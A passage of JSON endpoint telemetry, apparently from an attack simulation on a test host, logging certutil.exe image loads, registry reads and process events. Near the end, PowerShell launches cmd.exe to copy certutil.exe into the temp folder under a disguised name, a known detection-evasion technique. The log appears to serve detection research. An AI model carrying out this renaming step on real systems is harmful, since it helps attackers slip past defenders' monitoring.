"event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500420000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "certcli.dll", - "image_path": "C:\\Windows\\System32\\certcli.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500580000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "Wldap32.dll", - "image_path": "C:\\Windows\\System32\\Wldap32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "msasn1.dll", - 
"image_path": "C:\\Windows\\System32\\msasn1.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "certca.dll", - "image_path": "C:\\Windows\\System32\\certca.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "cryptsp.dll", - "image_path": "C:\\Windows\\System32\\cryptsp.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "cabinet.dll", - "image_path": "C:\\Windows\\System32\\cabinet.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "cryptui.dll", - "image_path": "C:\\Windows\\System32\\cryptui.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 1688, - 
"process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "comctl32.dll", - "image_path": 
"C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17134.441_none_f952a0bb30955e96\\comctl32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "ncrypt.dll", - "image_path": "C:\\Windows\\System32\\ncrypt.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "ntasn1.dll", - "image_path": "C:\\Windows\\System32\\ntasn1.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "netapi32.dll", - "image_path": "C:\\Windows\\System32\\netapi32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "normaliz.dll", - "image_path": "C:\\Windows\\System32\\normaliz.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "ntdsapi.dll", - "image_path": "C:\\Windows\\System32\\ntdsapi.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": 
"ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "setupapi.dll", - "image_path": "C:\\Windows\\System32\\setupapi.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": 
"C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": 
"C:\\Windows\\System32\\fltLib.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\System32\\version.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "secur32.dll", - "image_path": "C:\\Windows\\System32\\secur32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "samcli.dll", - "image_path": "C:\\Windows\\System32\\samcli.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "dsrole.dll", - "image_path": "C:\\Windows\\System32\\dsrole.dll", - "pid": 1688, - "process_name": 
"certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "logoncli.dll", - "image_path": "C:\\Windows\\System32\\logoncli.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "msctf.dll", - "image_path": "C:\\Windows\\System32\\msctf.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": 
"C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": 
"{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": 
"C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "process", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "subtype": "terminate", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "file", - "file_name": "CERTUTIL.EXE-CB7805D7.pf", - "file_path": "C:\\Windows\\Prefetch\\CERTUTIL.EXE-CB7805D7.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "process", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": 
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4308, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573501270016, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4308, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501200016, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4308, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501200016, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4308, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501200016, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4308, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501200016, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4308, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501200016, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" - }, - { 
- "event_type": "process", - "pid": 4308, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573501360000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"cmd.exe /c copy %%windir%%\\\\system32\\\\certutil.exe %%temp%%tcm.tmp\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3940, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573501930000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3940, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501820000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3940, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501820000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - 